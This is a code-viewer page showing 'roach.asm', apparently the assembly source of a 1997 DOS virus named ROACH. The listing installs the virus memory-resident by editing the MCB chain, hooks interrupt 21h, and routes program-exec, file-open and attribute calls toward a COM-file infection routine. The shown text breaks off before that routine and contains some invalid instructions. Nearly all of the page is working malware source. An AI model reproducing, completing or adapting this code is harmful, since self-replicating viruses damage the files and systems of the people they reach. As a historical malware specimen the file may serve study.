📄 roach.asm
字号:
;Developed and Programmed in Australia.
;Copy_ya_right 1997
;Virus Name : ROACH
;The ROACH virus will install itself memory resident, below the video memory.
;once this virus is in memory it will only infect COM files. It will not
;infect command.com.
;--------------------------- S T A R T -------------------------------------
host_start: ;start of the host file
jmp virus_start ;start the virus code
mov ah,4ch ;exit the virus code
int 21h ;dos call
;----- This is the start of the virus code ----------------------------------
virus_start: ;start of the virus code
mov ax,sp ;load ax with stack pointer
mov si,ax ;move stack pointer to si
mov ax,ss ;move stack segment to ax
mov ds,ax ;load ds with stack segment
mov di,100h ;point to the host start
mov cx,2 ;we need to do this twice
push_100_to_stack:
dec si,2 ;dec the stack pointer
mov sp,si ;move the stack pointer
mov word ptr ds:[si],di ;save di to the stack
loop push_100_to_stack ;do it twice
inc di ;inc byte one
mov al,byte ptr es:[di]
mov ah,byte ptr es:[di+1]
add ax,103h
mov bp,ax ;save to the
add si,2 ;inc the stack pointer
mov sp,si ;mov the stack pointer
mov di,word ptr ds:[si] ;get the address from stack
mov si,bp ;load si with fix address
add si,virus_len ;and host to the source index
sub si,3
push es
pop ds ;get the data segment
mov cx,3 ;move 3 bytes
rep movsb ;and move the data back
mov ax,5432h ;are we resident
int 21h ;dos call
cmp ax,0063h ;are we resident
jne memory_resident ;lets go resident
exit_virus:
xor ax,ax ;fix up
mov bx,ax ;fix up
mov cx,ax ;fix up
mov dx,ax ;fix up
mov di,ax ;fix up
mov si,ax ;fix up
mov es,ax ;fix up
ret ;and return to the host
;----- This makes the virus go memory resident ------------------------------
memory_resident:
mov ah,52h ;get the list of lists
int 21h ;dos call
mov ax,es:[bx-2] ;load ax first mcb chain
mov es,ax ;set es to first mcb block
mcb1:
cmp byte ptr es:[0],'Z' ;is it the last mcb chain
jne mcb2 ;not then next mcb chain
clc ;clear carry flag
jmp mcbx ;found last mcb chain, bail
mcb2:
mov ax,es ;mov extra segment to ax
add ax,word ptr es:[3] ;add from the list
inc ax ;fix up
mov es,ax ;es is the new segment
jmp short mcb1 ;and do it again
mcbx:
mov byte ptr es:[0],'Z' ;make it the last mcb chain
sub word ptr es:[3],virus_len/15 ;take the virus from the mcb
add ax,word ptr es:[3] ;
inc ax ;fix up the address
mov es,ax ;es is the new segment
push es ;save to the stack
push cs ;push the code segment
pop ds ;get ds from the stack
mov ax,3521h ;get interrupt 21h
int 21h ;dos call
mov si,bp ;load the si with virus start
add si,virus_len ;add the virus len to it
sub si,7
mov word ptr ds:[si],bx ;save the old int 21h vector
mov word ptr ds:[si+2],es ;save the old int 21h vector
pop ds ;get from the stack
mov ax,2521h ;get the interrupt vector
mov dx,new_21
int 21h ;dos call
push ds
pop es
push cs
pop ds
xor di,di
mov si,bp ;offset of the start of virus
mov cx,virus_len ;number of bytes to move
do_load_tsr:
mov ax,word ptr ds:[si] ;load the byte from host
mov word ptr es:[di],ax ;store the byte in memory
add si,2 ;inc the host pointer
add di,2 ;inc the memory pointer
loop do_load_tsr
push cs ;push the code segment
pop ds ;reset ds to the original
jmp exit_virus ;exit the virus code
db '[Roach] by SliceMaster 1997' ;copyright string roach
;----- This is the code that runs in memory ---------------------------------
exit_virus_tsr:
jmp dword ptr cs:[data_start] ;exit back to the function
fake_dos_function:
pushf ;save the flags
call dword ptr cs:[data_start] ;fake a dos call
ret ;and return
new_21h:
cmp ax,5432h ;is it the virus checking
jne check_interrupts ;check out the interrupts
mov ax,0063h ;yep we are in memory
iret ;interrupt return
check_interrupts:
inc ah ;add one the the function
cmp ah,4ch ;load and exec a program
je go_virus_infect ;this is our interrupt
cmp ah,3eh ;open file call
je go_virus_infect ;this is our interrupt
cmp ah,44h ;change attrubute call
je go_virus_infect ;this is our interrupt
dec ah ;sub one from the function
jmp exit_virus_tsr ;exit the virus in memory
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -